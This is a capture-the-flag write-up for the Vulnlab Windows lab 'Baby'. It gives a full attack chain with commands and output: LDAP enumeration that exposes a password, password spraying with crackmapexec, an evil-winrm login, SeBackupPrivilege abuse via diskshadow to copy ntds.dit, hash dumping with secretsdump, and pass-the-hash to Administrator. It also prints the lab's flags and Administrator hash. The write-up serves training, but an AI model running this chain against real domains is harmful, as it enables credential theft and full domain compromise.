Vulnlab Windows Easy: Baby
Baby is an Easy rated Windows machine on Vulnlab.
Vulnlab Windows Easy: Baby
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.126.15
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-26 14:24 CET
Nmap scan report for 10.10.126.15
Host is up (0.028s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-26 13:24:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-01-25T13:22:46
|_Not valid after: 2024-07-26T13:22:46
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-01-26T13:24:52+00:00
|_ssl-date: 2024-01-26T13:25:31+00:00; +3s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-26T13:24:55
|_ start_date: N/A
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 56.66 seconds
Modify hosts file.
1
2
3
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts | grep 10.10.126.15
10.10.126.15 baby.vl BabyDC.baby.vl
Enumerate LDAP (Port 389)
Ldap query finds a password in the description.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.126.15" "(objectclass=*)"
ldap_initialize( ldap://10.10.126.15:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132819812778759642
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWWgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Teresa.Bell
sAMAccountType: 805306368
userPrincipalName: Teresa.Bell@baby.vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163014.0Z
dSCorePropagationData: 20211121162927.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0
Get all the SAM account names from Ldap.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.126.15" "(objectclass=*)" | grep 'sAMAccountName'
ldap_initialize( ldap://10.10.126.15:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson
Create username file (password: BabyStart123!).
1
2
3
4
5
6
7
8
9
10
11
12
Guest
dev
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
it
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
Use crackmapexec to bruteforce all users.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.126.15 -u users -p 'BabyStart123!'
SMB 10.10.126.15 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Guest:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\dev:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\it:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.126.15 445 BABYDC [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
We need to modify the password of the Caroline.Robinson user before we are allowed to login: Link: BabyStart123!!.
1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ smbpasswd -r 10.10.126.15 -U "caroline.robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson
Evil-winrm into the machine using the caroline.robinson user and our newly created password.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ evil-winrm -u 'Caroline.Robinson' -p 'BabyStart123!!' -i 10.10.126.15
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> whoami
baby\\caroline.robinson
User flag: VL{b2c6150b85125d32f4b253df9540d898}
1
2
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Desktop> type user.txt
VL{b2c6150b85125d32f4b253df9540d898}
Privilege Escalation
Using whoami /priv we can list our permissions.
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The SeBackupPrivilege allows us to backup any file. Use the following PoC.
1
2
3
4
5
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> upload Downloads/*.dll
Info: Uploading /home/kali/Downloads/*.dll to C:\\Users\\Caroline.Robinson
Info: Upload successful!
Now that the DLL’s are transferred we can follow this: Link.
1
2
3
4
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> Import-Module .\\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> Import-Module .\\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> Copy-FileSeBackupPrivilege C:\\Users\\Administrator\\Desktop\\root.txt .\\root.txt
Root flag: VL{9000cab96bcf62e99073ff5f6653ce90}
1
2
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> type root.txt
VL{9000cab96bcf62e99073ff5f6653ce90}
Shell as Adminstrator
Create script for diskshadow.
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~]
└─$ cat script.txt
set metadata C:\\Windows\\Temp\\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
Upload the script and execute.
1
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> diskshadow /s script.txt
The ntds.dit file should now be on the E drive (we can move it to the C drive).
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\\temp> dir
Directory: C:\\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/26/2024 3:03 PM 16777216 ntds.dit
In order to get the hashes out of the ntds.dit file, we also need the SYSTEM file: Link.
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> reg.exe save HKLM\\SYSTEM .\\SYSTEM
The operation completed successfully.
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson> download SYSTEM
Info: Downloading C:\\Users\\Caroline.Robinson\\SYSTEM to SYSTEM
Info: Download successful!
Use secretsdump from impacket to extract the hashes.
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ ./secretsdump.py -ntds /home/kali/ntds.dit -system /home/kali/SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from /home/kali/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Evil-winrm using the NTLM hash of the administrator user.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ evil-winrm -u "Administrator" -H "ee4457ae59f1e3fbd764e33d9cef123d" -i 10.10.126.15
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> whoami
baby\\administrator
This post is licensed under CC BY 4.0 by the author.